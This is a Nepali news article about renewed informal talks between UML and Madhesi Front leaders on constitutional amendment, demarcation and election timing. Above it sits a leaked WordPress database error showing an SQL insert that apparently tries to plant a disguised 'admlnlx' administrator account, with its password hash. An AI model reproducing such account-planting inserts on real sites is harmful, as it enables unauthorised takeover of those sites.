WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMY1mpfneCWUEzFI10inUnNI9427Dy/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-17 15:45:55', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २८–
डेढ वर्षयताको तिक्तता मेट्दै एमाले र मधेसी मोर्चा नेताहरु संवादमा सक्रिय भएका छन्। १६ बुँदे सहमति र संविधान निर्माणसगै बढेको दूरी घटाउन दुवै पक्षको शीर्ष नेतृत्वको सहमतिमा दोस्रो तहका नेताहरु यो साताभरि भेटवार्ताहरुमा अग्रसर भए। तमलोपा अध्यक्ष महन्थ ठाकुरले आफ्नो दलका दोस्रो तहका नेताहरुले एमाले पक्षसँग संवाद गरिरहेको कान्तिपुरसँग खुलाए। एमाले नेताहरुले पनि ठाकुरको भनाई पुष्टि गर्दै मोर्चासग कुराकानी भइरहेको बताए। आजको कान्तिपुर दैनिकमा खबर छ ।
मोर्चासित एमालेको तर्फबाट उपाध्यक्ष भीम रावल, उपमहासचिव विष्णु पौडेल र सचिव प्रदीप ज्ञवालीले वार्ताको अग्रसरता लिएका छन्। मोर्चाबाट तमलोपा वरिष्ठ उपाध्यक्ष हृदयेश त्रिपाठी, महामन्त्री सर्वेन्द्रनाथ शुक्ल, सद्भावना पार्टी सहअध्यक्ष लक्ष्मणलाल कर्णले संवाद बढाइरहेको स्रोतले भन्यो। कर्णले भने आफू बैठकहरुमा सहभागी नरहेको बताए। मोर्चा नेताहरुको दाबीमा पछिल्लो एक सातायता भएका चरणबद्ध भेटहरु एमाले अध्यक्ष केपी ओलीको चाहनामा दोस्रो तहका नेताहरुको तर्फबाट आयोजना भएका हुन्। एमाले स्रोत भने मोर्चाभित्र उदार विचार राख्ने पक्ष आफैं संवाद बढाउन अग्रसर भएको दाबी गर्छ। ‘मधेसी मोर्चासित संवादहीनता तोडियो, अब छलफल सुरु भएको छ,’ एमालेको तर्फबाट पछिल्ला भेटहरुमा सहभागी सचिव प्रदीप ज्ञवालीले भने, ‘यी भेटहरुको बारेमा अध्यक्षलाई सबै जानकारी छ। तर परिणामको बारेमा हामी ढुक्क छैनौं।’ मोर्चाभित्र एमालेलाई हेर्नेबारे दुई धार रहेकाले आफूसित संवादरत पक्षले सिंगो मोर्चालाई एमालेसग सहकार्य गर्ने तहसम्म ल्याउछ भन्नेमा आफूहरुलाई कम विश्वास रहेको एमालेका अर्का नेताले बताए। ‘तर एमालेलाई बाहिर राखेर एजेन्डाहरु टुंगो लगाउन सकिन्न भन्ने रियलाइजेशन उहाँहरुलाई भएजस्तो देखियो, कुराकानीको क्रममा,’ ती नेताले भने।
एमाले उपाध्यक्ष भीम रावलले भने मोर्चा पक्षसग भएका वार्ताहरु अनौपचारिक प्रकृतिकै रहेको दाबी गरे। ‘देशलाई अप्ठेरो परेका बेला सबैसग कुरा गरौं भन्ने स्पिरिटमै मोर्चासग कुरा भएको हो,’ रावलले भने, ‘औपचारिक किसिमले कुरा गर्न बाँकी छ।’ उच्च स्रोतका अनुसार प्रधानमन्त्री तथा माओवादी केन्द्र अध्यक्ष पुष्पकमल दाहाल र कांग्रेस सभापति शेरबहादुर देउवाबीचको सत्ता आलोपालो सहमतिको म्याद गुज्रिन लागेकाले नया सम्भावनाहरुको खोजी गर्दै चुनावसम्म जाने मार्गचित्रबारे एमाले–मोर्चाबीच कुराकानी भइरहेको छ। स्रोतका अनुसार एमाले नेताहरुले जेठमै चुनाव गर्नका लागि स।विधान संशोधन विधेयक पारित गरिहाल्न अनावश्यक जोड नदिनका लागि मोर्चालाई सुझाव दिएका छन्। ‘एकैचोटि तीनवटा चुनाव कात्तिक र मंसिरमा गरौं, तीमध्ये पहिले संसदकै चुनाव गरौं भन्ने हाम्रो भनाई मोर्चालाई राखिसकेका छौं,’ ती एमाले नेताले भने, ‘उहाहरुले सल्लाह गरेर आउछौं भन्नुभएको छ।’
एमाले पक्षको भनाई पुष्टि गर्दै मोर्चाका उच्च नेताले आफूहरुको चाहना पनि स्थानीय चुनावमा नभएको, एमालेले प्रदेश र स्थानीय चुनाव पहिले नचाहलेकाले अब संसदीय चुनावकै लागि सहमति हुन सक्ने सम्भावना बताए। ‘एमालेका साथीहरुले आफ्नो कुरा खुल्लै ढंगले राख्नुभएको छ, अब हाम्रोबीचमा न्युनतम धारणा बन्न सक्यो भने छलफल गर्न सजिलो हुन्छ,’ मोर्चा नेताले भने, ‘हामीले संविधान स।शोधन विधेयक एमालेकै पुरानो प्रस्ताव भएको भन्दै त्यो पहिले छिनोफानो गर्न भनेका छौं, सीमांकनबार एमालेले आयोग बनाई त्यसैका जिम्मा छाडिदिउँ, बरु आयोगको समयसीमा घटाएर ३ महिनामा झारे आफूलाई फरक पर्दैन भनिरहेको छ। यसमा ठोस कुरा मिल्न बाकी छ।’